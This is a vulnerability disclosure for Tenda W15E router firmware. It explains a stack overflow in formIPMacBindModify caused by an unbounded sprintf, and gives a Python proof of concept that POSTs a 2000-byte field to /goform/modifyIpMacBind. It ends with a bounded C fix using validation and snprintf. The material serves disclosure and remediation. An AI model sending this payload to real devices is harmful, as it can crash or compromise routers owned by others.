- Firmware download website: https://www.tendacn.com/download/detail-2722.html
W15EV1.0 V15.11.0.14
The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the `formIPMacBindModify` function. The `ruleIndex`, `ip`, `mac` and `remark` variables receive the `IPMacBindRuleId`, `IPMacBindRuleIp`, `IPMacBindRuleMac` and `IPMacBindRuleRemark` parameters from a POST request. However, since the user can control the input of `IPMacBindRuleId`, `IPMacBindRuleIp`, `IPMacBindRuleMac` and `IPMacBindRuleRemark`, the statement

```c
sprintf(
    (char *)tmp,
    "%s;1;%s;%s;name%d;%s",
    (const char *)ruleId,
    (const char *)ip,
    (const char *)mac,
    v6,
    (const char *)remark);
```

can cause a buffer overflow. The user-provided `IPMacBindRuleId`, `IPMacBindRuleIp`, `IPMacBindRuleMac` and `IPMacBindRuleRemark` values can exceed the capacity of the `tmp` array, triggering this security vulnerability.
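```python
import requests
from pwn import *

# Address of the device in the test setup
ip = "192.168.84.101"
url = "http://" + ip + "/goform/modifyIpMacBind"

# 2000-byte value for IPMacBindRuleIp, which exceeds the capacity of tmp
payload = b"a" * 2000
data = {
    'IPMacBindRuleIp': payload,
}
response = requests.post(url, data=data)
print(response.text)
```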
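A bounded form of the `sprintf` call shown above, as an added example that is not code from the firmware or from the original report. The names `build_bind_rule`, `valid_mac`, `valid_rule_id`, `RULE_BUF_LEN` and `REMARK_MAX` are hypothetical, and the sizes are assumptions because the page does not state the capacity of `tmp`.

```c
#include <arpa/inet.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define RULE_BUF_LEN 256  /* assumed size; the page does not give tmp's capacity */
#define REMARK_MAX   64   /* assumed policy limit for the remark field */

/* Accept only the aa:bb:cc:dd:ee:ff form (exactly 17 characters). */
static int valid_mac(const char *s) {
    if (strlen(s) != 17) return 0;
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) { if (s[i] != ':') return 0; }
        else if (!isxdigit((unsigned char)s[i])) return 0;
    }
    return 1;
}

/* Accept a short, all-digit rule id (length limit is an assumption). */
static int valid_rule_id(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n > 4) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)s[i])) return 0;
    return 1;
}

/* Bounded replacement for the sprintf() call: 0 on success, -1 on rejection. */
int build_bind_rule(char *out, size_t out_len, const char *rule_id, const char *ip,
                    const char *mac, int idx, const char *remark) {
    struct in_addr addr;
    if (!rule_id || !ip || !mac || !remark) return -1;
    if (!valid_rule_id(rule_id) || !valid_mac(mac)) return -1;
    if (strlen(ip) > 15 || inet_pton(AF_INET, ip, &addr) != 1) return -1;
    /* ';' separates the fields in the format string, so it may not appear in remark. */
    if (strlen(remark) > REMARK_MAX || strchr(remark, ';')) return -1;
    int n = snprintf(out, out_len, "%s;1;%s;%s;name%d;%s", rule_id, ip, mac, idx, remark);
    /* snprintf returns the length it needed; treat truncation as an error. */
    if (n < 0 || (size_t)n >= out_len) return -1;
    return 0;
}

int main(void) {
    char rule[RULE_BUF_LEN], big[2001];
    memset(big, 'a', 2000); big[2000] = '\0';  /* constructed oversized field */
    printf("valid: %d\n", build_bind_rule(rule, sizeof rule, "1", "192.168.0.10", "00:11:22:33:44:55", 1, "pc"));
    printf("oversized ip: %d\n", build_bind_rule(rule, sizeof rule, "1", big, "00:11:22:33:44:55", 1, "pc"));
    return 0;
}
```

Each field is checked against its expected shape before formatting, and the `snprintf` return value catches any case where the combined record would still not fit.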